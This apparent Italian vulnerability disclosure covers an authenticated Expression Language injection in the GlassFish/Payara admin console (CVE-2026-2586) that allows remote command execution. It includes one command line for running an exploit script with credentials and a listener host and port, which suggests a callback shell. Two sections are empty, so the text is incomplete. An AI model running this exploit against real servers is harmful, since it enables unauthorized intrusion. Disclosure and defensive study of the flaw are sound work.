
Exploit di injection EL autenticato per la console di amministrazione GlassFish/Payara che consente l'esecuzione remota di comandi tramite parametri modificati nel flusso di configurazione del server virtuale.
Una vulnerabilità di iniezione di Expression Language nella console di amministrazione di GlassFish consente a un utente autenticato di iniettare espressioni EL dannose nei parametri elaborati dall'interfaccia web amministrativa. Uno sfruttamento riuscito può portare all'esecuzione remota di comandi sul server interessato.
La vulnerabilità è stata identificata nel flusso di modifica della configurazione virtuale del server, dove i parametri controllabili dall'utente vengono interpretati in modo non sicuro dall'applicazione.
Ciò accade perché:
Il test è stato eseguito in un ambiente locale e controllato.
CVE-2026-2586.py --url https://glassfish:4848/ --user <USERNAME> --password <PASSWORD> --lhost 127.0.0.1 --lport 4444 --insecure
URL vulnerabile:
SOLO USO AUTORIZZATO. DeepSecurity Perú non approva l'accesso non autorizzato e non si assume alcuna responsabilità per l'uso improprio delle informazioni fornite.